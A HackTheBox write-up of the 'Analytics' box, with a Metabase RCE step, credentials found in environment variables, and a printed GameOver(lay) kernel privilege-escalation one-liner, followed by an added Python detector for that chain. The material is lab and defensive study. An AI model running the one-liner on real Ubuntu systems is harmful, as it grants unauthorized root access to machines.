Analytics - HackTheBox
By: Logan Pedroza
First we start with an nmap scan of the box
We see that port 80 (HTTP) is open
Add analytical.htb to our /etc/hosts file and navigate to the site
We see a static webpage with a login feature that brings us to http://data.analytical.htb/
The site is running Metabase, some versions of which are vulnerable because of an unprotected setup token
This allows us to create a new user on the database, giving us remote code execution
https://github.com/kh4sh3i/cve-2023-38646
We are now on the box, but there is no flag yet. If we look at the environment variables, we see credentials that allow us to SSH into the machine
Now we ssh and find the flag.txt in the home directory
We do not have sudo permission
The box is using Ubuntu kernel version 6.2.0, which is vulnerable to the GameOver(lay) local privilege escalation attack
https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629
```
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash")'
```
Once the PoC command is executed, we have root permissions and find the flag in the /root directory
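
On the detection side, the one-liner above leaves recognizable process command lines. The following is an added example, not part of the original writeup or of the linked PoC repository: it correlates the indicators visible in that command per uid. The record layout (`uid=<n> cmd=<command line>`), the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Patterns derived from the one-liner in this writeup. Each is weak alone;
# several under one unprivileged uid is the signal worth alerting on.
INDICATORS = {
    "userns_map_root": re.compile(
        r"\bunshare(?:\s+-\S+)*?\s+(?:-[A-Za-z]*r[A-Za-z]*|--map-root-user)(?=\s|$)"),
    "setcap_setuid": re.compile(r"\bsetcap\s+\S*cap_setuid"),
    "overlay_mount": re.compile(r"\bmount\s+-t\s+overlay\b.*\bupperdir="),
    "suid_shell": re.compile(r"\bchmod\s+(?:[4-7][0-7]{3}|u\+s)\s+\S*sh\b"),
}
# Assumed record layout for this example: "uid=<n> cmd=<command line>"
RECORD = re.compile(r"uid=(\d+)\s+cmd=(.*)")


def indicators(cmdline):
    """Return the sorted names of the indicators matching one command line."""
    return sorted(n for n, rx in INDICATORS.items() if rx.search(cmdline))


def suspicious_uids(log_lines, threshold=3):
    """Return {uid: indicators} for non-root uids reaching the threshold."""
    seen = defaultdict(set)
    for line in log_lines:
        m = RECORD.search(line)
        if m and m.group(1) != "0":  # root gains nothing from this chain
            seen[m.group(1)].update(indicators(m.group(2)))
    return {u: sorted(h) for u, h in seen.items() if len(h) >= threshold}


# Constructed process-exec records, not captured from a real host.
SAMPLE_LOG = [
    "uid=1000 cmd=unshare -rm sh",
    "uid=1000 cmd=setcap cap_setuid+eip l/python3",
    "uid=1000 cmd=mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m",
    "uid=1001 cmd=unshare -rm sh",            # lone userns use, e.g. rootless tooling
    "uid=1001 cmd=chmod 755 deploy.sh",       # no setuid bit
    "uid=0 cmd=mount -t overlay overlay -o lowerdir=/a,upperdir=/b,workdir=/c /mnt",
]

if __name__ == "__main__":
    for uid, hits in suspicious_uids(SAMPLE_LOG).items():
        print(f"ALERT uid={uid}: {', '.join(hits)}")
```

Only uid 1000 is flagged: it combines a root-mapped user namespace, a `cap_setuid` file capability and an overlay mount, while the lone `unshare` and the root-owned mount stay below the threshold.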